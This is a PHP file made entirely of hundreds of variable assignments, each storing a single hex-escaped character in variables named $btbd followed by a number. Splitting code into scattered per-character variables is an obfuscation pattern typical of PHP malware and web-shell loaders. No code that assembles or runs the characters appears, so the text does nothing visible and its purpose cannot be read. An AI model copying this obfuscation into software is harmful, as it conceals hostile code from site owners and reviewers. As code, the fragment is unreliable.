$btbd1252="\x69";
$btbd1045="\x09";$btbd54="\x69";$btbd288="\x68";$btbd432="\x69";$btbd409="\x3b";$btbd1062="\x5c";$btbd1317="\x6c";$btbd1279="\x6a";
$btbd17="\x20";$btbd282="\x74";$btbd14="\x65";$btbd164="\x3d";$btbd1110="\x79";$btbd1242="\x40";$btbd1552="\x65";$btbd1121="\x6c";$btbd197="\x3d";$btbd1375="\x3c";$btbd1398="\x20";$btbd812="\x65";$btbd36="\x6e";$btbd50="\x62";$btbd725="\x64";$btbd607="\x6f";$btbd747="\x6f";$btbd617="\x09";
$btbd728="\x73";$btbd1029="\x3d";$btbd667="\x73";$btbd433="\x70";$btbd1547="\x65";
$btbd1028="\x63";
$btbd329="\x6c";$btbd1660="\x72";$btbd1637="\x72";$btbd670="\x69";
$btbd1331="\x29";$btbd240="\x65";$btbd1572="\x65";$btbd1391="\x24";
$btbd450="\x61";$btbd1105="\x73";$btbd762="\x28";$btbd1186="\x69";$btbd801="\x20";
$btbd1588="\x6d";$btbd1692="\x24";$btbd759="\x69";
$btbd1099="\x73";$btbd1075="\x3b";$btbd629="\x3b";$btbd543="\x63";
$btbd773="\x28";$btbd1240="\x3d";
$btbd1460="\x74";$btbd526="\x79";$btbd1627="\x61";
$btbd1441="\x74";$btbd1171="\x3b";$btbd306="\x69";$btbd163="\x20";$btbd970="\x3d";$btbd668="\x70";$btbd834="\x2e";$btbd198="\x20";$btbd1433="\x3b";$btbd180="\x3d";$btbd1116="\x73";
$btbd1567="\x65";$btbd771="\x6e";$btbd209="\x65";$btbd418="\x20";$btbd1698="\x61";$btbd1049="\x6f";$btbd1504="\x20";$btbd1306="\x69";$btbd1298="\x72";
$btbd945="\x24";$btbd1341="\x24";$btbd291="\x68";$btbd1054="\x3d";$btbd1549="\x73";$btbd115="\x64";$btbd613="\x22";$btbd1212="\x69";$btbd522="\x68";$btbd817="\x29";$btbd1168="\x2d";
$btbd1486="\x61";$btbd1196="\x69";$btbd1368="\x20";$btbd1222="\x6a";$btbd359="\x40";$btbd22="\x20";$btbd1220="\x20";$btbd1127="\x6d";$btbd649="\x24";$btbd748="\x64";
$btbd1044="\x0a";$btbd139="\x75";$btbd765="\x69";$btbd118="\x61";$btbd968="\x20";$btbd1210="\x74";$btbd375="\x24";$btbd602="\x79";$btbd452="\x6b";$btbd952="\x6e";
$btbd833="\x20";$btbd1042="\x22";$btbd400="\x64";$btbd1676="\x65";$btbd975="\x0a";$btbd519="\x66";
$btbd122="\x6c";$btbd503="\x65";$btbd1377="\x24";$btbd267="\x79";$btbd1628="\x6d";$btbd648="\x2b";$btbd300="\x68";
$btbd1445="\x20";$btbd332="\x67";$btbd1313="\x6d";$btbd454="\x6f";
$btbd225="\x28";
$btbd842="\x61";$btbd552="\x69";$btbd590="\x73";$btbd1558="\x20";$btbd12="\x20";$btbd695="\x22";
$btbd1012="\x0a";$btbd283="\x65";$btbd1027="\x24";$btbd976="\x09";
$btbd903="\x5c";$btbd1073="\x3b";$btbd1340="\x20";$btbd124="\x66";$btbd646="\x20";$btbd1214="\x20";$btbd755="\x5c";$btbd1052="\x20";
$btbd1529="\x20";$btbd32="\x65";
$btbd1561="\x6f";$btbd1379="\x3b";$btbd289="\x69";$btbd128="\x72";$btbd18="\x63";$btbd746="\x63";$btbd173="\x09";$btbd1707="\x61";$btbd41="\x29";
$btbd1715="\x0a";$btbd1124="\x7b";$btbd1213="\x66";$btbd1669="\x63";$btbd1352="\x22";$btbd1640="\x61";$btbd1132="\x61";$btbd687="\x78";$btbd1706="\x76";
$btbd873="\x23";$btbd1495="\x6e";$btbd108="\x72";$btbd918="\x69";
$btbd1475="\x76";$btbd656="\x09";$btbd224="\x64";$btbd1435="\x09";$btbd171="\x3b";$btbd1021="\x20";$btbd114="\x65";$btbd1425="\x32";$btbd5="\x65";$btbd1592="\x6d";
$btbd1234="\x2c";$btbd636="\x20";$btbd1473="\x73";$btbd116="\x2c";$btbd662="\x65";
$btbd544="\x72";
$btbd238="\x65";$btbd1249="\x2c";
$btbd592="\x72";$btbd575="\x61";$btbd606="\x63";$btbd322="\x3b";$btbd684="\x22";$btbd547="\x74";
$btbd876="\x72";$btbd1471="\x75";$btbd1710="\x24";$btbd504="\x63";$btbd1013="\x0a";$btbd769="\x28";$btbd1235="\x20";$btbd731="\x69";$btbd861="\x20";$btbd484="\x77";$btbd736="\x69";$btbd724="\x72";
$btbd1332="\x29";$btbd351="\x0a";$btbd1574="\x74";$btbd1287="\x09";
$btbd1461="\x68";
$btbd110="\x73";$btbd56="\x6e";$btbd616="\x0a";
$btbd178="\x69";$btbd1189="\x28";$btbd187="\x79";$btbd1693="\x67";
$btbd631="\x24";$btbd1130="\x28";$btbd925="\x24";$btbd169="\x66";$btbd1119="\x66";$btbd597="\x29";$btbd151="\x0a";$btbd1691="\x2b";
$btbd832="\x65";
$btbd896="\x64";$btbd85="\x31";$btbd96="\x20";$btbd427="\x65";$btbd1093="\x3b";$btbd1397="\x67";$btbd717="\x5b";$btbd894="\x63";$btbd815="\x6c";
$btbd1685="\x6e";$btbd1434="\x0a";$btbd701="\x72";$btbd371="\x73";$btbd1482="\x2c";$btbd1370="\x3b";$btbd605="\x6d";
$btbd1167="\x2d";$btbd836="\x20";$btbd91="\x69";$btbd154="\x09";$btbd562="\x0a";
$btbd869="\x20";$btbd246="\x6e";$btbd1555="\x20";$btbd847="\x6d";$btbd1160="\x20";$btbd1011="\x3b";
$btbd417="\x23";$btbd1406="\x6e";$btbd353="\x09";
$btbd593="\x69";
$btbd1039="\x65";$btbd252="\x23";$btbd69="\x6f";$btbd548="\x2c";$btbd1034="\x72";$btbd851="\x3b";
$btbd470="\x65";
$btbd989="\x20";$btbd1517="\x6e";$btbd381="\x20";$btbd1505="\x63";$btbd1307="\x6e";$btbd1102="\x20";$btbd1524="\x6e";
$btbd704="\x61";$btbd311="\x66";$btbd1354="\x0a";$btbd622="\x28";$btbd1611="\x6e";$btbd1647="\x6e";
$btbd428="\x20";$btbd1152="\x28";$btbd1260="\x61";$btbd1270="\x20";$btbd1314="\x79";$btbd1587="\x20";$btbd1345="\x69";$btbd1173="\x20";$btbd191="\x63";$btbd979="\x09";$btbd1576="\x61";$btbd1385="\x29";
$btbd412="\x7d";$btbd295="\x69";$btbd1094="\x0a";$btbd1634="\x24";$btbd1066="\x61";$btbd531="\x5f";$btbd533="\x68";$btbd906="\x76";$btbd1609="\x20";
$btbd346="\x24";$btbd1091="\x64";$btbd1488="\x73";
$btbd1131="\x24";$btbd132="\x72";$btbd953="\x74";$btbd1182="\x6a";$btbd119="\x6c";$btbd389="\x0a";$btbd1651="\x74";$btbd55="\x61";
$btbd787="\x20";$btbd1479="\x6f";$btbd688="\x25";$btbd882="\x2b";$btbd738="\x29";
$btbd80="\x74";$btbd1380="\x20";$btbd117="\x20";$btbd444="\x65";$btbd1665="\x4f";$btbd365="\x74";$btbd385="\x20";$btbd1068="\x5f";$btbd857="\x20";$btbd1535="\x69";$btbd824="\x67";$btbd1125="\x0a";
$btbd683="\x5c";$btbd165="\x20";$btbd396="\x20";$btbd1557="\x73";$btbd940="\x69";
$btbd71="\x73";$btbd284="\x72";$btbd229="\x65";$btbd1060="\x6c";$btbd1172="\x29";$btbd1590="\x74";
$btbd1089="\x63";$btbd678="\x25";$btbd591="\x74";$btbd1061="\x20";
$btbd1284="\x5d";$btbd494="\x75";$btbd927="\x63";$btbd665="\x3d";
$btbd938="\x22";
$btbd120="\x6c";
$btbd1359="\x20";
$btbd576="\x72";$btbd1440="\x65";$btbd1500="\x61";$btbd1184="\x3d";$btbd1553="\x0a";
$btbd620="\x72";$btbd1579="\x3a";$btbd111="\x65";$btbd825="\x0a";$btbd1237="\x6a";$btbd336="\x24";
$btbd1522="\x69";$btbd439="\x61";$btbd540="\x5c";$btbd465="\x68";$btbd152="\x7b";
$btbd723="\x6f";$btbd1098="\x0a";$btbd423="\x6f";
$btbd1139="\x29";$btbd74="\x67";$btbd250="\x0a";$btbd1420="\x72";$btbd1199="\x20";$btbd278="\x61";$btbd4="\x72";$btbd474="\x23";$btbd1001="\x61";$btbd886="\x29";$btbd1509="\x75";$btbd232="\x25";$btbd1155="\x20";$btbd137="\x0a";
$btbd134="\x65";$btbd1088="\x6d";$btbd219="\x09";$btbd974="\x3b";
$btbd1057="\x65";$btbd121="\x20";$btbd799="\x09";
$btbd1570="\x6f";
$btbd309="\x0a";$btbd276="\x63";
$btbd696="\x2c";$btbd1337="\x09";$btbd921="\x3b";$btbd627="\x20";$btbd1595="\x70";$btbd148="\x72";$btbd753="\x20";$btbd879="\x74";$btbd1257="\x09";$btbd1135="\x20";
$btbd3="\x6f";$btbd277="\x68";$btbd379="\x65";$btbd8="\x65";$btbd247="\x29";$btbd1649="\x72";
$btbd560="\x3b";$btbd1295="\x75";
$btbd791="\x30";$btbd1325="\x72";$btbd467="\x66";
$btbd16="\x6c";$btbd1537="\x63";$btbd1585="\x20";$btbd1078="\x0a";$btbd1157="\x69";$btbd830="\x6f";$btbd1711="\x6e";$btbd420="\x61";$btbd912="\x6d";
$btbd1241="\x20";
$btbd501="\x72";$btbd506="\x20";
$btbd1533="\x20";$btbd669="\x72";
$btbd1291="\x0a";$btbd1388="\x0a";$btbd1323="\x74";$btbd972="\x30";$btbd83="\x6e";$btbd1191="\x61";$btbd852="\x0a";
$btbd271="\x20";$btbd939="\x20";$btbd1623="\x3e";$btbd962="\x29";$btbd466="\x75";$btbd601="\x6d";
$btbd673="\x66";$btbd1025="\x22";$btbd1532="\x2c";$btbd840="\x24";$btbd1648="\x65";$btbd1315="\x20";$btbd645="\x3b";$btbd1180="\x20";$btbd59="\x72";$btbd681="\x64";$btbd1008="\x22";$btbd647="\x2b";
$btbd263="\x61";
$btbd1534="\x73";
$btbd194="\x70";$btbd609="\x65";$btbd1233="\x69";
$btbd1154="\x79";
$btbd887="\x20";$btbd1598="\x24";$btbd477="\x68";$btbd1437="\x0a";$btbd1446="\x24";$btbd168="\x69";$btbd718="\x24";$btbd1516="\x65";$btbd1038="\x6d";$btbd642="\x69";$btbd848="\x65";$btbd129="\x65";$btbd135="\x64";$btbd1151="\x20";$btbd1178="\x6d";$btbd1465="\x69";$btbd998="\x72";$btbd281="\x63";$btbd1115="\x5f";$btbd863="\x20";$btbd915="\x2e";
$btbd1206="\x09";$btbd764="\x24";$btbd1343="\x74";$btbd1573="\x6e";$btbd1476="\x65";$btbd1708="\x6c";$btbd719="\x69";$btbd1185="\x20";$btbd1503="\x23";$btbd850="\x22";
$btbd142="\x6d";$btbd1229="\x61";$btbd902="\x22";$btbd958="\x64";$btbd31="\x20";
$btbd1478="\x63";$btbd274="\x65";$btbd1324="\x28";$btbd1358="\x72";
$btbd796="\x7d";$btbd823="\x6e";$btbd933="\x3d";$btbd1604="\x70";$btbd338="\x6f";$btbd1003="\x65";$btbd1351="\x22";$btbd227="\x69";$btbd186="\x6d";$btbd1090="\x6f";$btbd335="\x28";$btbd1635="\x76";$btbd241="\x72";$btbd644="\x74";
$btbd217="\x0a";$btbd749="\x65";$btbd46="\x39";
$btbd1429="\x39";$btbd507="\x63";$btbd1320="\x20";
$btbd1140="\x20";
$btbd814="\x61";$btbd260="\x61";$btbd1510="\x74";$btbd24="\x6f";$btbd1360="\x28";$btbd1616="\x70";$btbd1610="\x24";
$btbd88="\x65";$btbd355="\x75";$btbd1085="\x6e";$btbd1583="\x6e";$btbd1554="\x23";$btbd266="\x61";
$btbd205="\x6e";$btbd1521="\x74";$btbd967="\x29";$btbd383="\x69";$btbd790="\x20";$btbd781="\x29";$btbd1228="\x24";$btbd1334="\x32";$btbd1493="\x20";$btbd393="\x75";
$btbd515="\x65";$btbd426="\x7a";
$btbd222="\x61";$btbd1384="\x69";$btbd73="\x20";$btbd778="\x28";$btbd1113="\x65";$btbd1150="\x72";$btbd1017="\x63";$btbd810="\x65";$btbd995="\x24";$btbd354="\x70";
$btbd987="\x2e";
$btbd872="\x24";$btbd1657="\x3b";$btbd1309="\x0a";$btbd411="\x09";$btbd298="\x20";
$btbd1079="\x09";$btbd929="\x64";$btbd1083="\x75";$btbd570="\x3b";
$btbd980="\x24";
$btbd555="\x65";$btbd1508="\x70";$btbd596="\x28";$btbd1107="\x65";$btbd568="\x20";$btbd514="\x74";$btbd405="\x2c";$btbd1387="\x7b";$btbd1243="\x24";$btbd331="\x6e";$btbd910="\x6e";$btbd1625="\x65";$btbd690="\x32";
$btbd1694="\x65";$btbd1219="\x3d";$btbd201="\x2c";$btbd804="\x6c";$btbd581="\x65";$btbd1513="\x34";$btbd788="\x3d";$btbd628="\x30";$btbd210="\x73";
$btbd743="\x09";$btbd1568="\x78";$btbd950="\x28";$btbd1084="\x72";
$btbd900="\x3d";$btbd959="\x28";$btbd516="\x72";$btbd1436="\x7d";$btbd1087="\x24";
$btbd35="\x69";$btbd557="\x65";$btbd330="\x65";$btbd1251="\x24";
$btbd297="\x64";$btbd844="\x5f";
$btbd6="\x2d";$btbd374="\x28";$btbd386="\x31";
$btbd1036="\x6e";$btbd26="\x70";$btbd1283="\x69";
$btbd149="\x70";$btbd785="\x29";
$btbd369="\x75";$btbd528="\x74";$btbd1395="\x69";$btbd65="\x0a";
$btbd1043="\x3b";$btbd675="\x22";$btbd1330="\x33";$btbd394="\x73";
$btbd502="\x72";$btbd395="\x68";$btbd1607="\x6e";$btbd1165="\x3b";$btbd904="\x24";$btbd317="\x69";$btbd479="\x6d";
$btbd917="\x24";
$btbd1653="\x6f";$btbd783="\x31";$btbd889="\x0a";
$btbd177="\x24";$btbd1230="\x31";$btbd1485="\x65";$btbd1369="\x30";$btbd489="\x6e";
$btbd160="\x6f";$btbd1026="\x5c";$btbd1432="\x29";$btbd299="\x74";$btbd1689="\x0a";$btbd1560="\x72";$btbd666="\x20";$btbd1123="\x0a";$btbd1713="\x3b";$btbd1703="\x3b";$btbd89="\x72";$btbd245="\x6f";$btbd1286="\x0a";$btbd1606="\x69";$btbd1250="\x20";$btbd216="\x3b";
$btbd633="\x20";$btbd1022="\x2e";
$btbd1179="\x79";$btbd1318="\x20";$btbd1355="\x09";$btbd1267="\x24";
$btbd37="\x65";$btbd1618="\x6e";$btbd951="\x69";$btbd650="\x69";
$btbd1349="\x3d";$btbd1402="\x73";$btbd7="\x70";$btbd293="\x62";$btbd1442="\x75";$btbd1032="\x76";$btbd1018="\x6f";$btbd481="\x73";$btbd1489="\x20";$btbd1128="\x79";$btbd302="\x20";$btbd588="\x64";$btbd280="\x61";$btbd327="\x3c";
$btbd356="\x73";
$btbd109="\x65";$btbd1170="\x69";$btbd1602="\x3b";$btbd1659="\x70";$btbd157="\x20";$btbd1677="\x20";$btbd358="\x20";
$btbd505="\x74";$btbd170="\x74";$btbd585="\x72";$btbd448="\x74";$btbd659="\x63";$btbd75="\x65";$btbd1071="\x6d";$btbd584="\x20";
$btbd206="\x64";$btbd1065="\x76";$btbd1176="\x09";
$btbd608="\x64";$btbd845="\x6e";$btbd469="\x6c";$btbd1663="\x74";$btbd456="\x20";$btbd28="\x69";$btbd1458="\x23";$btbd138="\x73";$btbd1280="\x2c";
$btbd726="\x28";$btbd901="\x20";
$btbd1614="\x0a";$btbd226="\x74";$btbd202="\x20";
$btbd106="\x73";$btbd1374="\x20";$btbd1059="\x61";$btbd233="\x24";$btbd1275="\x61";
$btbd204="\x69";$btbd42="\x20";$btbd1248="\x6a";$btbd1632="\x68";$btbd632="\x69";$btbd1327="\x6e";$btbd806="\x75";$btbd641="\x72";$btbd1192="\x6e";$btbd1136="\x24";
$btbd1600="\x63";$btbd1593="\x6f";
$btbd1016="\x6d";$btbd156="\x79";$btbd652="\x20";$btbd1459="\x20";$btbd1565="\x67";$btbd307="\x70";$btbd272="\x74";$btbd237="\x67";$btbd1009="\x3b";
$btbd1641="\x6d";$btbd982="\x63";$btbd366="\x2c";$btbd408="\x69";$btbd1654="\x6e";$btbd499="\x63";$btbd468="\x66";$btbd1055="\x20";$btbd414="\x0a";$btbd884="\x24";$btbd64="\x72";$btbd1344="\x72";$btbd1014="\x09";
$btbd212="\x3d";$btbd1670="\x3b";$btbd1423="\x64";
$btbd1682="\x63";
$btbd682="\x3d";$btbd1626="\x74";
$btbd1120="\x66";$btbd545="\x69";$btbd1361="\x6d";
$btbd1256="\x09";$btbd1204="\x0a";$btbd578="\x6e";
$btbd1468="\x72";$btbd729="\x63";$btbd415="\x0a";$btbd1463="\x73";$btbd1023="\x3d";$btbd70="\x6e";
$btbd441="\x2c";$btbd1571="\x6e";$btbd244="\x69";
$btbd643="\x70";
$btbd923="\x09";$btbd621="\x20";
$btbd1106="\x68";$btbd275="\x20";
$btbd742="\x09";$btbd141="\x20";$btbd583="\x3d";$btbd763="\x28";
$btbd634="\x3c";$btbd658="\x6d";
$btbd539="\x28";$btbd1453="\x3b";$btbd23="\x6d";$btbd1365="\x69";
$btbd341="\x29";$btbd679="\x73";$btbd367="\x20";$btbd538="\x65";
$btbd864="\x30";$btbd1428="\x2b";$btbd573="\x24";$btbd388="\x3b";$btbd625="\x20";$btbd1002="\x6d";
$btbd1272="\x20";$btbd40="\x43";
$btbd176="\x20";$btbd500="\x6f";
$btbd911="\x61";
$btbd1392="\x73";$btbd188="\x20";$btbd1070="\x61";
$btbd829="\x63";$btbd1702="\x6e";$btbd192="\x72";$btbd90="\x73";$btbd1477="\x20";
$btbd1539="\x20";$btbd158="\x24";$btbd818="\x20";$btbd1020="\x65";$btbd183="\x3b";
$btbd84="\x2d";$btbd626="\x3d";$btbd1371="\x20";$btbd328="\x20";$btbd1673="\x6c";$btbd1617="\x65";$btbd387="\x29";$btbd449="\x72";
$btbd207="\x65";$btbd831="\x64";$btbd994="\x2e";$btbd694="\x3b";
$btbd1520="\x61";$btbd145="\x61";$btbd1245="\x31";$btbd874="\x73";
$btbd87="\x76";$btbd890="\x09";$btbd1095="\x7d";$btbd577="\x5f";
$btbd556="\x78";$btbd919="\x2e";$btbd0="\x23";$btbd368="\x73";
$btbd858="\x28";$btbd193="\x69";$btbd1041="\x3b";$btbd803="\x61";$btbd146="\x6d";$btbd15="\x72";
$btbd1494="\x6f";$btbd1575="\x69";
$btbd1282="\x24";$btbd419="\x72";
$btbd287="\x77";$btbd1108="\x72";$btbd258="\x64";
$btbd1411="\x25";$btbd1530="\x73";$btbd1147="\x09";$btbd384="\x2c";$btbd345="\x2b";$btbd1258="\x40";$btbd1304="\x74";$btbd867="\x24";$btbd1006="\x69";
$btbd1081="\x65";
$btbd33="\x6e";
$btbd243="\x74";$btbd1198="\x2b";
$btbd1551="\x7a";$btbd460="\x20";
$btbd113="\x76";$btbd320="\x20";
$btbd546="\x70";$btbd1599="\x24";
$btbd166="\x73";$btbd184="\x0a";$btbd104="\x68";$btbd1399="\x2e";
$btbd935="\x22";$btbd865="\x3b";$btbd600="\x09";$btbd1431="\x29";$btbd1209="\x78";$btbd235="\x2a";$btbd737="\x5d";$btbd680="\x25";$btbd813="\x76";$btbd819="\x73";
$btbd1705="\x65";$btbd878="\x70";$btbd1543="\x20";$btbd707="\x2c";$btbd1450="\x69";$btbd1366="\x20";
$btbd881="\x20";$btbd981="\x6d";$btbd1141="\x3d";$btbd775="\x61";
$btbd76="\x6e";$btbd430="\x63";$btbd898="\x20";$btbd757="\x22";$btbd1153="\x6d";$btbd993="\x22";$btbd1470="\x63";$btbd1499="\x63";$btbd1197="\x20";$btbd1633="\x2d";$btbd899="\x2e";$btbd1278="\x24";
$btbd1409="\x28";$btbd1404="\x72";$btbd1187="\x6e";$btbd1683="\x3d";$btbd1564="\x6e";$btbd1296="\x62";$btbd476="\x74";$btbd1051="\x65";$btbd991="\x5c";$btbd1356="\x66";$btbd1342="\x73";$btbd279="\x72";
$btbd897="\x65";$btbd1037="\x61";$btbd931="\x20";
$btbd459="\x77";$btbd1688="\x3b";$btbd462="\x65";$btbd1714="\x0a";$btbd1507="\x6d";$btbd1004="\x2e";$btbd294="\x75";$btbd720="\x5d";$btbd693="\x22";$btbd660="\x6f";$btbd264="\x72";$btbd1329="\x28";$btbd392="\x70";
$btbd849="\x3d";$btbd196="\x20";$btbd1159="\x3d";$btbd892="\x24";$btbd871="\x20";$btbd966="\x29";$btbd1656="\x29";$btbd1668="\x6e";
$btbd536="\x66";$btbd727="\x24";$btbd92="\x6f";$btbd1216="\x69";$btbd1297="\x20";$btbd1064="\x24";$btbd930="\x65";$btbd1239="\x20";$btbd761="\x20";$btbd635="\x3d";$btbd292="\x20";$btbd1497="\x79";$btbd709="\x24";$btbd541="\x40";$btbd94="\x0a";$btbd828="\x6d";$btbd323="\x20";$btbd313="\x72";$btbd983="\x6f";$btbd1175="\x0a";$btbd946="\x69";$btbd907="\x61";$btbd770="\x69";$btbd1339="\x79";
$btbd1624="\x6d";$btbd1164="\x31";$btbd190="\x73";$btbd1347="\x67";$btbd473="\x09";$btbd722="\x20";$btbd350="\x7b";$btbd789="\x3d";$btbd446="\x70";
$btbd1193="\x64";$btbd1372="\x24";$btbd1203="\x3b";$btbd1680="\x0a";$btbd594="\x6e";$btbd587="\x6e";
$btbd1223="\x3b";$btbd1303="\x73";$btbd1137="\x61";$btbd1383="\x24";$btbd1556="\x69";
$btbd1664="\x20";$btbd1285="\x3b";$btbd961="\x30";$btbd1024="\x20";$btbd362="\x72";$btbd1067="\x72";$btbd908="\x72";$btbd776="\x6e";$btbd676="\x5c";$btbd1048="\x63";
$btbd786="\x29";$btbd130="\x76";$btbd58="\x4b";$btbd1542="\x65";
$btbd305="\x72";
$btbd999="\x5f";$btbd582="\x20";$btbd256="\x69";$btbd674="\x28";$btbd1403="\x70";$btbd751="\x2e";$btbd140="\x62";$btbd611="\x3d";$btbd1498="\x20";$btbd805="\x63";$btbd1679="\x3b";$btbd1311="\x0a";$btbd471="\x64";$btbd397="\x40";$btbd343="\x20";$btbd535="\x66";$btbd1646="\x65";$btbd360="\x73";$btbd95="\x23";$btbd964="\x31";$btbd1322="\x6e";$btbd234="\x24";$btbd315="\x28";$btbd1613="\x3b";$btbd416="\x09";$btbd699="\x76";$btbd988="\x3d";$btbd893="\x6d";$btbd1421="\x61";$btbd586="\x61";
$btbd1630="\x72";
$btbd265="\x72";$btbd1200="\x31";$btbd934="\x20";$btbd1381="\x2b";$btbd1259="\x24";$btbd1247="\x24";
$btbd485="\x65";$btbd1396="\x6e";$btbd661="\x64";$btbd131="\x65";$btbd451="\x63";$btbd86="\x20";$btbd553="\x6e";$btbd77="\x65";$btbd1601="\x29";$btbd768="\x20";$btbd672="\x74";$btbd337="\x63";
$btbd671="\x6e";$btbd565="\x69";$btbd1097="\x0a";$btbd750="\x20";$btbd1177="\x09";$btbd1100="\x75";
$btbd523="\x65";$btbd333="\x74";$btbd1519="\x72";$btbd319="\x3d";$btbd1301="\x64";$btbd1348="\x20";$btbd716="\x73";$btbd398="\x69";$btbd1512="\x20";$btbd273="\x68";$btbd1333="\x2b";$btbd370="\x62";$btbd143="\x65";$btbd734="\x5b";$btbd63="\x65";$btbd891="\x09";$btbd569="\x30";
$btbd1686="\x63";$btbd363="\x69";$btbd1364="\x24";$btbd38="\x20";$btbd880="\x3b";$btbd253="\x20";$btbd1268="\x6a";$btbd712="\x64";$btbd1386="\x20";$btbd236="\x24";$btbd715="\x65";$btbd1163="\x61";$btbd1443="\x72";
$btbd1400="\x3d";$btbd1678="\x4f";
$btbd1264="\x69";$btbd1166="\x20";$btbd1492="\x75";$btbd657="\x24";$btbd1262="\x5b";$btbd1515="\x67";
$btbd182="\x30";
$btbd619="\x6f";
$btbd518="\x09";$btbd782="\x2b";$btbd1277="\x5b";$btbd510="\x65";$btbd1335="\x3b";$btbd1645="\x67";$btbd1451="\x6e";$btbd1419="\x28";$btbd66="\x23";$btbd1586="\x3d";
$btbd1092="\x65";$btbd487="\x63";$btbd1559="\x67";$btbd978="\x0a";
$btbd1373="\x69";$btbd162="\x65";
$btbd996="\x76";$btbd1563="\x69";
$btbd868="\x69";$btbd905="\x24";
$btbd364="\x70";$btbd1474="\x69";$btbd79="\x61";$btbd914="\x22";
$btbd102="\x69";$btbd1712="\x63";
$btbd463="\x20";$btbd721="\x2c";$btbd123="\x65";$btbd1484="\x6d";$btbd1238="\x5d";$btbd957="\x6e";
$btbd732="\x70";$btbd1231="\x5b";$btbd1305="\x72";
$btbd1076="\x0a";$btbd57="\x20";$btbd223="\x6e";
$btbd883="\x2b";$btbd127="\x20";$btbd1101="\x62";$btbd550="\x5c";$btbd1612="\x63";
$btbd841="\x76";$btbd30="\x67";$btbd19="\x6f";
$btbd529="\x65";
$btbd1426="\x30";$btbd559="\x29";$btbd714="\x78";
$btbd1338="\x6d";$btbd963="\x2b";$btbd440="\x79";$btbd870="\x3c";$btbd926="\x6d";
$btbd404="\x73";$btbd537="\x6c";$btbd1244="\x61";$btbd1138="\x32";$btbd735="\x24";$btbd706="\x65";$btbd1074="\x22";
$btbd794="\x0a";$btbd27="\x68";$btbd1302="\x5f";$btbd11="\x6c";
$btbd1080="\x72";$btbd838="\x5c";$btbd512="\x6c";$btbd324="\x24";$btbd604="\x24";$btbd875="\x63";
$btbd1201="\x29";$btbd443="\x6b";$btbd45="\x30";$btbd62="\x6d";$btbd1362="\x79";$btbd774="\x72";$btbd1407="\x74";$btbd1414="\x2c";
$btbd1353="\x3b";$btbd1569="\x70";
$btbd612="\x20";$btbd1584="\x63";$btbd1605="\x72";$btbd1511="\x65";
$btbd349="\x20";$btbd797="\x0a";$btbd984="\x64";
$btbd1697="\x72";
$btbd1671="\x0a";$btbd1129="\x20";$btbd1326="\x61";$btbd741="\x0a";$btbd1162="\x24";$btbd1246="\x5b";$btbd464="\x73";$btbd1174="\x7b";
$btbd1699="\x74";$btbd310="\x09";$btbd1010="\x22";$btbd1490="\x79";$btbd837="\x22";$btbd497="\x64";$btbd1142="\x20";$btbd1389="\x09";$btbd1454="\x0a";
$btbd344="\x2b";$btbd1687="\x22";
$btbd475="\x20";$btbd916="\x22";$btbd1525="\x73";$btbd61="\x68";$btbd496="\x6c";$btbd262="\x20";$btbd855="\x6f";$btbd1376="\x20";$btbd1506="\x6f";$btbd195="\x74";$btbd1580="\x29";$btbd1224="\x0a";$btbd1393="\x74";$btbd1265="\x2c";$btbd1281="\x20";$btbd376="\x63";$btbd766="\x20";$btbd944="\x28";$btbd826="\x09";$btbd380="\x2c";$btbd458="\x6f";
$btbd447="\x20";$btbd304="\x63";$btbd34="\x67";$btbd784="\x29";$btbd703="\x6e";$btbd932="\x2e";$btbd1144="\x5f";$btbd1146="\x0a";$btbd1217="\x20";$btbd1684="\x22";$btbd1466="\x73";$btbd144="\x74";$btbd378="\x64";$btbd527="\x61";$btbd752="\x3d";$btbd303="\x73";
$btbd301="\x65";$btbd655="\x09";$btbd909="\x5f";$btbd406="\x20";
$btbd623="\x24";$btbd702="\x5f";$btbd410="\x0a";$btbd567="\x3d";$btbd1378="\x6c";$btbd429="\x73";$btbd13="\x50";$btbd1103="\x66";$btbd402="\x78";$btbd598="\x3b";$btbd1538="\x65";
$btbd1292="\x0a";$btbd1015="\x24";
$btbd314="\x20";$btbd1528="\x72";$btbd1541="\x68";
$btbd1109="\x5f";$btbd60="\x61";$btbd809="\x74";$btbd947="\x20";
$btbd1183="\x20";$btbd1143="\x40";$btbd2="\x6d";$btbd1652="\x69";$btbd49="\x65";$btbd713="\x65";
$btbd651="\x29";$btbd105="\x74";$btbd1544="\x63";$btbd549="\x20";$btbd1578="\x20";$btbd685="\x5c";
$btbd1681="\x24";$btbd214="\x28";$btbd1269="\x5d";$btbd442="\x20";$btbd835="\x3d";$btbd1481="\x65";$btbd495="\x69";$btbd436="\x61";
$btbd1328="\x64";$btbd986="\x20";$btbd457="\x68";$btbd199="\x28";$btbd208="\x78";$btbd1226="\x09";$btbd1293="\x0a";
$btbd1271="\x3d";
$btbd1422="\x6e";$btbd1169="\x24";
$btbd1545="\x6f";$btbd1619="\x28";$btbd1195="\x24";$btbd357="\x68";$btbd321="\x30";$btbd653="\x7b";
$btbd67="\x20";$btbd574="\x76";$btbd885="\x69";$btbd1367="\x3d";$btbd1622="\x22";$btbd1597="\x28";$btbd220="\x73";$btbd1194="\x28";$btbd231="\x29";$btbd21="\x65";$btbd1058="\x76";$btbd147="\x6f";$btbd1531="\x6f";$btbd795="\x09";$btbd1462="\x69";$btbd1255="\x0a";$btbd579="\x61";$btbd1415="\x20";
$btbd1382="\x2b";$btbd1096="\x0a";$btbd1412="\x63";$btbd638="\x23";$btbd211="\x20";$btbd1253="\x5d";
$btbd920="\x22";
$btbd103="\x67";$btbd1077="\x09";$btbd859="\x24";$btbd1122="\x65";$btbd1672="\x63";
$btbd1030="\x27";$btbd615="\x3b";$btbd1577="\x6c";
$btbd486="\x20";$btbd407="\x24";$btbd1310="\x7b";
$btbd637="\x24";$btbd153="\x0a";$btbd561="\x0a";
$btbd1562="\x77";$btbd862="\x3d";$btbd1047="\x6d";$btbd1501="\x6e";$btbd242="\x61";$btbd1424="\x28";$btbd1033="\x61";$btbd1438="\x09";$btbd1566="\x20";
$btbd1514="\x20";$btbd705="\x6d";$btbd48="\x53";$btbd997="\x61";$btbd1469="\x65";
$btbd399="\x6e";
$btbd1205="\x09";
$btbd730="\x72";
$btbd438="\x72";$btbd1608="\x74";$btbd179="\x20";$btbd1662="\x6e";
$btbd435="\x20";$btbd924="\x09";$btbd377="\x6f";$btbd1232="\x24";$btbd93="\x6e";$btbd1156="\x24";
$btbd1316="\x24";$btbd1491="\x6f";$btbd434="\x74";
$btbd316="\x24";$btbd1418="\x74";$btbd1390="\x09";
